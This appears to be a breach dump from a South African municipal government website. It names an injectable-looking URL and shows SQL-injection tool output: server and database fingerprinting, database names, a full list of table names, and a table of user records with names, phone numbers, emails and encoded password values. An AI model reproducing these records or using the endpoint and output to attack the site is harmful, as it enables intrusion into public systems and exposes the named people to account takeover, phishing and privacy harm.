.gov  Government 	 

.za 	South Africa (Zuid Afrika)

Buffalo City Metropolitan Municipality

https://www.buffalocity.gov.za/article.php?id=5abe1d4

web server operating system: Windows 10 or 2016 or 2019
web application technology: PHP 5.6.40, Microsoft IIS 10.0
back-end DBMS: MySQL >= 5.0.12

[+] buffaloc_projectt_bcmapp
[+] freshproduce
[+] information_schema
[+] mysql
[+] performance_schema
[+] sys

Database: buffaloc_projectt_bcmapp
[65 tables]
+--------------------------+
| about_bcmm               |
| activity_log             |
| additional_user_accounts |
| admin                    |
| awarded_tenders          |
| business                 |
| chat_box                 |
| contact_details          |
| contact_us               |
| customer_care            |
| departments              |
| directorates             |
| emergencies              |
| eservices                |
| events                   |
| executive_mayor          |
| failed_login             |
| faqs                     |
| fault_departments        |
| feedback                 |
| files                    |
| folder                   |
| fraud_hotline            |
| gallery                  |
| idp_input                |
| incidents                |
| mayor_mandate            |
| mayor_profile            |
| mc                       |
| media_contacts           |
| media_statements         |
| mpac                     |
| news                     |
| newsletters              |
| notifications            |
| opportunities_bursaries  |
| password_change_requests |
| people                   |
| pr                       |
| privacy                  |
| public_notices           |
| query_reply              |
| ref_chat_box             |
| ref_generator            |
| ref_table                |
| residents                |
| resource_documents       |
| scroll_videos            |
| service_departments      |
| signup                   |
| speeches                 |
| subfolder                |
| survey_answer_options    |
| survey_answers           |
| survey_questions         |
| surveys                  |
| tender_openings          |
| tenders                  |
| terms                    |
| user_accounts            |
| users                    |
| vacancies                |
| ward                     |
| ward_emails              |
| web_tv                   |
+--------------------------+

+------------+---------+---------+-----------------------------+----------------------------------------------------------+
| cell       | name    | surname | email                       | password                                                 |
+------------+---------+---------+-----------------------------+----------------------------------------------------------+
| 0782256699 | Anele   | Mabona  | anelema@gmail.com           | T25KU3pNeXlra0w0QTl5U0I2SlBRZz09OjpUxaEg19ThJxYWzRtW+1iM |
| 3070       | Tembela | Siswana | tembelas@buffalocity.gov.za | SVJvZWNxbUNDakZZaHViOHlRNllCdz09Ojo8xGgWaeVzpRz4/nJrARTx |
| 3262       | Demo    | User    | info@buffalocity.gov.za     | NkRFSS96WG56Y1lxSEVqK2Q3T2tPdz09OjoerAniP5ccItqOBe9SR+ZP |
+------------+---------+---------+-----------------------------+----------------------------------------------------------+
